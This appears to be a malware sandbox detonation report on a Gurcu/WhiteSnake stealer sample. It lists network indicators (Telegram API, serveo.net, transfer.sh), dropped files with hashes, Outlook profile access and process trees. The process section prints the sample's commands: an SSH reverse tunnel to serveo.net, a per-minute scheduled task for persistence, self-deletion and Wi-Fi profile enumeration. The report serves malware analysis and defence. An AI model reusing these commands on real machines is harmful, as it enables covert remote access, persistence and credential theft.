FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp

Files

memory/2972-0-0x00000000010E0000-0x0000000001104000-memory.dmp

memory/2972-1-0x000007FEF5200000-0x000007FEF5BEC000-memory.dmp

memory/2972-2-0x000000001B380000-0x000000001B400000-memory.dmp

memory/2972-5-0x000007FEF5200000-0x000007FEF5BEC000-memory.dmp

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

MD5 35625d89730f70f12ecdeaf795722865
SHA1 0fedcad5039e3317d0e434bb038b81850e8f3599
SHA256 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5
SHA512 edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

MD5 35625d89730f70f12ecdeaf795722865
SHA1 0fedcad5039e3317d0e434bb038b81850e8f3599
SHA256 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5
SHA512 edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301

memory/2880-9-0x0000000001170000-0x0000000001194000-memory.dmp

memory/2880-10-0x000007FEF4810000-0x000007FEF51FC000-memory.dmp

memory/2880-11-0x000000001B410000-0x000000001B490000-memory.dmp

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

MD5 d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1 011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA256 2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512 de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

MD5 d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1 011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA256 2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512 de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

MD5 79a6e2268dfdba1d94c27f4b17265ff4
SHA1 b17eed8cb6f454700f8bfcfd315d5627d3cf741c
SHA256 6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5
SHA512 3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

MD5 79a6e2268dfdba1d94c27f4b17265ff4
SHA1 b17eed8cb6f454700f8bfcfd315d5627d3cf741c
SHA256 6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5
SHA512 3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

MD5 35625d89730f70f12ecdeaf795722865
SHA1 0fedcad5039e3317d0e434bb038b81850e8f3599
SHA256 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5
SHA512 edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301

memory/1808-126-0x000007FEF4810000-0x000007FEF51FC000-memory.dmp

memory/1808-127-0x000000001ADE0000-0x000000001AE60000-memory.dmp

C:\Users\Admin\AppData\Local\477mflh5px\port.dat

MD5 3487596cf54cb393afddaa965714ab1f
SHA1 a9abfec1f428ad27c5e83302509541ded06e3b94
SHA256 bcb05e9ef14b336689c3a2f3b2ee2a47e0a1625c8c4e333e8d24a2f95113c67f
SHA512 15afe86a97b35905e8c7b3b095199e689c1256ff3abeea14ad8db53c41ffda9e302dd4190ff5e1727e538c22dabab7e7e779a5725c5b5b81a9e3ade14667a391

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

MD5 d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1 011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA256 2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512 de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

MD5 79a6e2268dfdba1d94c27f4b17265ff4
SHA1 b17eed8cb6f454700f8bfcfd315d5627d3cf741c
SHA256 6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5
SHA512 3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

C:\Users\Admin\.ssh\known_hosts

MD5 18015a60cd12f33648facec1263cfafa
SHA1 31b7afd9a2dc51bfad694e5772d430fceedbac3f
SHA256 9ab8d1a229e05070a0364b5c5efd2ab1ddf676b0bc00314ec336bcdc00998190
SHA512 fcdb2e02f01c59916eaa08baeb74cc2f61eed6d96873f41a2299b752b9ec1af5db74a6eac6013c9a45a77d0bbc0431590f16fa74cff779eea97383e2fe073925

C:\Users\Admin\AppData\Local\Temp\Cab76B8.tmp

MD5 f3441b8572aae8801c04f3060b550443
SHA1 4ef0a35436125d6821831ef36c28ffaf196cda15
SHA256 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA512 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

memory/2880-152-0x000007FEF4810000-0x000007FEF51FC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Tar7728.tmp

MD5 9441737383d21192400eca82fda910ec
SHA1 725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256 bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA512 7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e221a78f42250fba946dc3deeb10a0d0
SHA1 8f8e77128293b691c4754ec10217279b53b76ce1
SHA256 57adae76913dda2e9c8262290f233f75607c63fda69104663f9e37d8a9232e02
SHA512 733ac3e8bb5ab3e0d694d97d4f274b84f1d633d5b683ac918be1b12027490c82bf0cc635684cb012e919bf8a38977524a4fea40d5df4d606da1e08bd8778182d

memory/2880-206-0x000000001B410000-0x000000001B490000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 cf923ff543369ac8c35048cfb09ae23c
SHA1 0a3b66728c364a9408af2f05d17a917a19643056
SHA256 35b3ddc0797fafa8fe8c1c97a5378372b36ac0baa5204c197d194194764301bb
SHA512 0ee588d49d73d0695a2f2e839165f0792734b99c3f98fc8a28b1b732bb2014f5f16054e070185987796249f653d23709cdcaf75d8e633203eb3dcb898dceee44

memory/1808-224-0x000007FEF4810000-0x000007FEF51FC000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-09-13 16:16

Reported

2023-09-13 16:20

Platform

win10v2004-20230831-en

Max time kernel

143s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe"

Signatures

Detect Gurcu Stealer V3 payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gurcu, WhiteSnake

stealer gurcu

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1304 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\System32\cmd.exe
PID 1304 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\System32\cmd.exe
PID 5028 wrote to memory of 4880 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 5028 wrote to memory of 4880 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 5028 wrote to memory of 4464 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 5028 wrote to memory of 4464 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 5028 wrote to memory of 4536 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 5028 wrote to memory of 4536 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 5028 wrote to memory of 4244 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
PID 5028 wrote to memory of 4244 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
PID 4244 wrote to memory of 4272 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\SYSTEM32\cmd.exe
PID 4244 wrote to memory of 4272 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\SYSTEM32\cmd.exe
PID 4272 wrote to memory of 900 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\chcp.com
PID 4272 wrote to memory of 900 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\chcp.com
PID 4272 wrote to memory of 2392 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\netsh.exe
PID 4272 wrote to memory of 2392 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\netsh.exe
PID 4272 wrote to memory of 3764 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\findstr.exe
PID 4272 wrote to memory of 3764 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\findstr.exe
PID 4244 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\SYSTEM32\cmd.exe
PID 4244 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\SYSTEM32\cmd.exe
PID 2600 wrote to memory of 392 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\chcp.com
PID 2600 wrote to memory of 392 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\chcp.com
PID 2600 wrote to memory of 1668 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\netsh.exe
PID 2600 wrote to memory of 1668 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\netsh.exe
PID 2600 wrote to memory of 2580 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\findstr.exe
PID 2600 wrote to memory of 2580 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\findstr.exe
PID 4244 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\System32\OpenSSH\ssh.exe
PID 4244 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\System32\OpenSSH\ssh.exe
PID 2596 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 2596 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 4596 wrote to memory of 5060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 4596 wrote to memory of 5060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 4596 wrote to memory of 3860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4596 wrote to memory of 3860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4596 wrote to memory of 5044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 4596 wrote to memory of 5044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2596 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 2596 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 1236 wrote to memory of 4552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1236 wrote to memory of 4552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1236 wrote to memory of 3084 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1236 wrote to memory of 3084 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1236 wrote to memory of 3636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 1236 wrote to memory of 3636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2596 wrote to memory of 5092 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\System32\OpenSSH\ssh.exe
PID 2596 wrote to memory of 5092 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\System32\OpenSSH\ssh.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe

"C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "Vfd663501e1ac13eb331505b8388e675450" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping 127.0.0.1

C:\Windows\system32\schtasks.exe

schtasks /create /tn "Vfd663501e1ac13eb331505b8388e675450" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\findstr.exe

findstr "SSID BSSID Signal"

C:\Windows\System32\OpenSSH\ssh.exe

"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:8229 serveo.net

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

C:\Windows\system32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\findstr.exe

findstr "SSID BSSID Signal"

C:\Windows\System32\OpenSSH\ssh.exe

"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:8229 serveo.net

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
N/A 127.0.0.1:8229 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 serveo.net udp
DE 159.89.214.31:22 serveo.net tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 31.214.89.159.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
GB 217.145.238.175:80 217.145.238.175 tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 232.200.77.51.in-addr.arpa udp
US 8.8.8.8:53 11.78.23.94.in-addr.arpa udp
US 8.8.8.8:53 175.238.145.217.in-addr.arpa udp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
N/A 127.0.0.1:8229 tcp
DE 159.89.214.31:22 serveo.net tcp
US 208.95.112.1:80 ip-api.com tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
GB 217.145.238.175:80 217.145.238.175 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
DE 144.76.136.153:443 transfer.sh tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
US 8.8.8.8:53 10.73.50.20.in-addr.arpa udp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
